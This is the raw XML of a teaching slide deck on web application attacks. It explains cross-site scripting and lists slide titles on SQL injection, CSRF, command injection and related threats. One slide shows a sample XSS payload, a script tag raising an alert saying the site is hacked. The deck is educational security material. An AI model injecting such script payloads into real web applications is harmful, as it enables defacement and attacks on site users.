                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>What is Cross- Site Scripting(XSS)?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1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Cross- Site Scripting(XSS) Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1524001"/>
            <a:ext cx="7086600" cy="4572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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web server gets data from web client (POST, GET etc) with the request. So a malicious User can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>include client side code snippets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> (JavaScript) into the data. For example : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert (‘this site has been hacked’) ;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>How XSS Works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>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6445</TotalTime>
  <Words>2799</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>296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WEB APPLICATION ATTACKS</vt:lpstr>
      <vt:lpstr>What is a Web Application?</vt:lpstr>
      <vt:lpstr>Inroduction</vt:lpstr>
      <vt:lpstr>Technologies Involved</vt:lpstr>
      <vt:lpstr>Typical Web Application Structure</vt:lpstr>
      <vt:lpstr>Common Web application Threats</vt:lpstr>
      <vt:lpstr>What is Cross- Site Scripting(XSS)?</vt:lpstr>
      <vt:lpstr>Cross- Site Scripting(XSS) Attack</vt:lpstr>
      <vt:lpstr>How XSS Works</vt:lpstr>
      <vt:lpstr>Type of XSS attacks</vt:lpstr>
      <vt:lpstr>Non-persistent XSS   also called as Reflected Xss</vt:lpstr>
      <vt:lpstr>Persistent XSS    also called as stored  Xss</vt:lpstr>
      <vt:lpstr>Persistent XSS</vt:lpstr>
      <vt:lpstr>Persistent XSS</vt:lpstr>
      <vt:lpstr>DOM based XSS attack</vt:lpstr>
      <vt:lpstr>What is SQL Injection?</vt:lpstr>
      <vt:lpstr>SQL Injection attacking example 1</vt:lpstr>
      <vt:lpstr>SQL Injection attacking example 2</vt:lpstr>
      <vt:lpstr>Parameter Tampering</vt:lpstr>
      <vt:lpstr>Parameter Tampering -Example</vt:lpstr>
      <vt:lpstr>Parameter Tampering - Example</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection Perl - Example</vt:lpstr>
      <vt:lpstr>Session Management</vt:lpstr>
      <vt:lpstr>Session Management Solutions</vt:lpstr>
      <vt:lpstr>Session Management Attack Scenarios</vt:lpstr>
      <vt:lpstr>Cookie Poisoning</vt:lpstr>
      <vt:lpstr>Cookie Poisoning - Example</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>Directory Traversal - Example</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>CSRF Continued</vt:lpstr>
      <vt:lpstr>CSRF Continued</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>Buffer Overflow Continued</vt:lpstr>
      <vt:lpstr>Buffer Overflow Continued -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Uday</dc:creator>
  <cp:lastModifiedBy>Michael Rushanan</cp:lastModifiedBy>
  <cp:revision>188</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-09-19T04:26:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-13T17:09:01Z</dcterms:modified>
</cp:coreProperties>
</file>